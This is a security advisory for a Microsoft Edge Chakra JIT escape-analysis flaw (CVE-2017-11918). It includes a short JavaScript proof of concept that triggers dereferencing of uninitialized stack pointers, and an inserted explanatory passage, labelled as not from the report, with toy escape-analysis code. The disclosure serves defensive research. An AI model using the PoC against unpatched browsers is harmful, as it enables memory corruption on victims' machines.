Microsoft Edge Chakra JIT Escape Analysis Bug

2018-01-10T00:00:00
ID PACKETSTORM:145787
Type packetstorm
Reporter Google Security Research
Modified 2018-01-10T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: JIT: Escape analysis bug   
  
CVE-2017-11918  
  
  
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
  
Chakra fails to detect that "tmp" escapes its scope and allocates it on the stack. This may lead to dereferencing uninitialized stack values.
  
PoC:
function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt()); // deref uninitialized stack pointers!
}

main();
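To make the analysis failure concrete, the following is an added illustration (not code from the report and not Chakra's actual escape analysis): a toy three-address IR, a naive "is the allocated variable returned by name?" check, and a field-sensitive points-to analysis. The PoC's opt() is lowered by hand into that IR; the naive rule reports nothing, while the points-to analysis sees that the returned value tmp[0] aliases tmp itself and must not be stack-allocated. Instruction shapes, variable names, and the sample bodies are all constructed for this example.

```javascript
// Toy escape analysis (added example, not Chakra's algorithm).
// Instruction forms, all constructed for this illustration:
//   { op: "alloc",  dst }             dst = new array (allocation site named after dst)
//   { op: "store",  obj, idx, src }   obj[idx] = src
//   { op: "load",   dst, obj, idx }   dst = obj[idx]
//   { op: "return", src }             return src

// Naive rule: an allocation escapes only if the allocated variable itself is
// the direct operand of a return. Aliases created through stores are ignored.
function naiveEscapes(body) {
  const sites = new Set(body.filter(i => i.op === "alloc").map(i => i.dst));
  const escaped = new Set();
  for (const ins of body) {
    if (ins.op === "return" && sites.has(ins.src)) escaped.add(ins.src);
  }
  return escaped;
}

// Field-sensitive points-to analysis iterated to a fixpoint; afterwards every
// allocation reachable from a returned value (directly or via stored fields)
// is marked as escaping and therefore unsafe to place on the stack.
function pointsToEscapes(body) {
  const pts = new Map();    // variable -> Set(allocation sites it may point to)
  const fields = new Map(); // site -> Map(idx -> Set(sites stored at that index))
  const setOf = (m, k) => { if (!m.has(k)) m.set(k, new Set()); return m.get(k); };
  const fieldOf = (site, idx) => {
    if (!fields.has(site)) fields.set(site, new Map());
    return setOf(fields.get(site), idx);
  };
  const union = (dst, src) => {
    let grew = false;
    for (const s of src) if (!dst.has(s)) { dst.add(s); grew = true; }
    return grew;
  };

  const returned = new Set();
  let changed = true;
  while (changed) {
    changed = false;
    for (const ins of body) {
      switch (ins.op) {
        case "alloc":
          changed = union(setOf(pts, ins.dst), [ins.dst]) || changed;
          break;
        case "store":
          for (const site of setOf(pts, ins.obj))
            changed = union(fieldOf(site, ins.idx), setOf(pts, ins.src)) || changed;
          break;
        case "load":
          for (const site of setOf(pts, ins.obj))
            changed = union(setOf(pts, ins.dst), fieldOf(site, ins.idx)) || changed;
          break;
        case "return":
          changed = union(returned, setOf(pts, ins.src)) || changed;
          break;
      }
    }
  }

  // Transitive closure: anything stored inside an escaping object escapes too.
  const escaped = new Set();
  const work = [...returned];
  while (work.length) {
    const site = work.pop();
    if (escaped.has(site)) continue;
    escaped.add(site);
    for (const s of (fields.get(site) || new Map()).values()) work.push(...s);
  }
  return escaped;
}

// The PoC's opt() lowered into the toy IR: tmp[0] = tmp; return tmp[0];
const POC_OPT = [
  { op: "alloc", dst: "tmp" },
  { op: "store", obj: "tmp", idx: 0, src: "tmp" },
  { op: "load", dst: "r", obj: "tmp", idx: 0 },
  { op: "return", src: "r" },
];

// A genuinely local array: only a constant is stored, so nothing escapes and
// stack allocation would be sound.
const LOCAL_ONLY = [
  { op: "alloc", dst: "tmp" },
  { op: "store", obj: "tmp", idx: 0, src: "const42" },
  { op: "load", dst: "r", obj: "tmp", idx: 0 },
  { op: "return", src: "r" },
];

console.log("naive:", [...naiveEscapes(POC_OPT)]);        // []      (misses the alias)
console.log("points-to:", [...pointsToEscapes(POC_OPT)]); // ["tmp"] (must stay on heap)
console.log("local only:", [...pointsToEscapes(LOCAL_ONLY)]); // []
```

The two analyses differ only in whether a value that flows through an object's field is tracked back to the object; a JIT that decides stack allocation on the weaker rule will hand out a pointer to a dead frame exactly as the PoC's comment describes.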
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  